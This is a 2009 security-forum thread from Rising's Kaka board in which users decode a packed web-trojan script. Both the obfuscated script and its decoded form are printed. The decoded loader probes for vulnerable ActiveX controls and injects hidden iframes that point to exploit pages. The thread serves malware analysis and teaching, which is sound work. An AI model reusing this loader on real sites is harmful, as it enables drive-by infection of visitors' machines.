关于一个网页木马解密的分析 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流关于一个网页木马解密的分析

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

关于一个网页木马解密的分析

本主题由版主天月来了于 2009-11-25 7:42:36 执行移动主题操作

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-25 00:59 \| 只看楼主短消息资料字号：小中大 1楼关于一个网页木马解密的分析 [复制到剪贴板] CODE: <script language="javaScript"> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29): c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]\|\|e(c);k=[function(e){return d[e]}];e=function(){return'\\ w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('G I(){3.5()}j{4 e;4 p=(3.F("c") );p.B("A","C:E-D-J-K-H");4 r=p.s("q.x","")}k(e){};l{i(e!="[c d]"){3.5("<2 7=0 6=0 a=y.9 8=0></2>")}j{4 f;4 z=n o("w.t")} k(f){};l{i(f!="[c d]"){3.5("<2 7=0 6=0 a=u.9 8=0></2>")}}j{4 g;4 m=n o("v.L.1")}k(g){};l{i(g!="[c d]"){3.5("<2 7=0 6=0 a =m.9 8=0></2>")}}j{4 h;4 m=n o("10.Y.1")}k(h){};l{i(h!="[c d]"){3.5("<2 7=0 6=0 a=Z.9 8=0></2>");3.5("<2 7=0 6=0 a=13.9 8=0></2>")}}j{4 b;4 m=n o("12")}k(b){};l{i(b!="[c d]"){3.5("<2 7=0 6=0 a=11.9 8=0></2>")}}j{4 b;4 m=n o("X. P")}k(b){};l{i(b!="[c d]"){3.5("<2 7=0 6=0 a=Q.9 8=0></2>")}}j{4 b;4 m=n o("O.M")}k(b){};l{i(b!="[c d]"){3.5("<2 7=0 6 =0 a=N.9 8=0></2>")}}3.5("<2 7=0 6=0 a=R.9 8=0></2>");3.5("<2 7=0 6=0 a=V.9 8=0></2>");3.5("<2 7=0 6=0 a= W.9 8=0></2>");3.5("<2 7=0 6=0 a=U.9 8=0></2>");3.5("<2 7=0 6=0 a=S.9 8=0></2>");3.5("<2 7=0 6=0 a=T.9 8= 0></2>")}',62,66,'\|\|iframe\|document\|var\|write\|height\|width\|frameborder\|htm\|src\|ii\|object\|Error\|\|\|\|\|if\|try\|catch\|finally\|p ps\|new\|ActiveXObject\|ado\|Adodb\|as\|createobject\|StormPlayer\|yyfb\|POWERPLAYER\|MPS\|Stream\|06014\|storm\|cl assid\|setAttribute\|clsid\|65A3\|BD96C556\|createElement\|function\|00C04FC29E36\|init\|11D0\|983A\|PowerPlayerCtrl\| WcUpload\|yahoo\|YWcUpl\|Vod\|xunlei5\|realplay\|0733\|baidu\|07004\|IENoRun\|xunlei\|DPClient\|GLChatCtrl\|lz_new\|G LCHAT\|cx\|Pdg2\|lz'.split('\|'),0,{})) </script> 这是一个Eval加密的网页木马，我的问题是我把开头的eval已经替换了alert，但怎么运行没反应啊？别人用alert一下就解了，我怎么就不行，纳闷。要他告诉一下怎么弄的也不肯，烦。。。。各位大侠帮我解一下密吧，顺便把方法提供一下（详细一点的）。 PS：木马地址已过期或不存在了，请放心测试。。。。用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	分享到：

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-11-25 09:11 \| 短消息资料字号：小中大 2楼回复：关于一个网页木马解密的分析代码不全吧，解密方法掌握即可。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-25 12:06 \| 只看楼主短消息资料字号：小中大 3楼回复：关于一个网页木马解密的分析代码是全的啊，别人都可以解啊，好像用火胡解的
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

shadowmin 拙长孩提狮帖子:69 注册: 2007-10-27 来自:	发表于： 2009-11-25 12:12 \| 短消息资料字号：小中大 4楼回复：关于一个网页木马解密的分析 function init() { document.write() } try { var e; var ado=(document.createElement("object")); ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var as=ado.createobject("Adodb.Stream","") } catch(e) { }; finally { if(e!="[object Error]") { document.write("<iframe width=0 height=0 src=06014.htm frameborder=0></iframe>") } try { var f; var storm=new ActiveXObject("MPS.StormPlayer") } catch(f) { }; finally { if(f!="[object Error]") { document.write("<iframe width=0 height=0 src=yyfb.htm frameborder=0></iframe>") } } try { var g; var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1") } catch(g) { }; finally { if(g!="[object Error]") { document.write("<iframe width=0 height=0 src=pps.htm frameborder=0></iframe>") } } try { var h; var pps=new ActiveXObject("GLCHAT.GLChatCtrl.1") } catch(h) { }; finally { if(h!="[object Error]") { document.write("<iframe width=0 height=0 src=lz_new.htm frameborder=0></iframe>"); document.write("<iframe width=0 height=0 src=lz.htm frameborder=0></iframe>") } } try { var ii; var pps=new ActiveXObject("Pdg2") } catch(ii) { }; finally { if(ii!="[object Error]") { document.write("<iframe width=0 height=0 src=cx.htm frameborder=0></iframe>") } } try { var ii; var pps=new ActiveXObject("DPClient.Vod") } catch(ii) { }; finally { if(ii!="[object Error]") { document.write("<iframe width=0 height=0 src=xunlei5.htm frameborder=0></iframe>") } } try { var ii; var pps=new ActiveXObject("YWcUpl.WcUpload") } catch(ii) { }; finally { if(ii!="[object Error]") { document.write("<iframe width=0 height=0 src=yahoo.htm frameborder=0></iframe>") } } document.write("<iframe width=0 height=0 src=realplay.htm frameborder=0></iframe>"); document.write("<iframe width=0 height=0 src=IENoRun.htm frameborder=0></iframe>"); document.write("<iframe width=0 height=0 src=xunlei.htm frameborder=0></iframe>"); document.write("<iframe width=0 height=0 src=07004.htm frameborder=0></iframe>"); document.write("<iframe width=0 height=0 src=0733.htm frameborder=0></iframe>"); document.write("<iframe width=0 height=0 src=baidu.htm frameborder=0></iframe>")} shadowmin 最后编辑于 2009-11-25 12:14:04
shadowmin 拙长孩提狮帖子:69 注册: 2007-10-27 来自:

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-25 12:23 \| 只看楼主短消息资料字号：小中大 5楼回复：关于一个网页木马解密的分析恩。就是像LS的一样，就解出来了。。怎么弄的呢？能否告诉一下啊？
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

shadowmin 拙长孩提狮帖子:69 注册: 2007-10-27 来自:	发表于： 2009-11-25 13:59 \| 短消息资料字号：小中大 6楼回复：关于一个网页木马解密的分析把代码拷到神器的解密窗口,然后右键,run script-->remove whitespace,得到整后的代码,你想怎么处理应该都可以了. 本帖被评分 1 次本帖被评分 1 次
shadowmin 拙长孩提狮帖子:69 注册: 2007-10-27 来自:

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-25 14:44 \| 只看楼主短消息资料字号：小中大 7楼回复：关于一个网页木马解密的分析没整明白？能不能具体一点，神器是什么？如果是直接用工具解密的话那肯定不行，主要是要方法
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-11-25 14:55 \| 短消息资料字号：小中大 8楼回复 7F dby107 的帖子这段代码里有空格，需要使用工具删除空格就可以正常解密了。用神器、redoce等工具都可以删除空格，处理后的代码就可以使用你提到方法来进行解密。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-25 15:25 \| 只看楼主短消息资料字号：小中大 9楼回复：关于一个网页木马解密的分析哦，谢谢了，已经明白了。呵呵
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT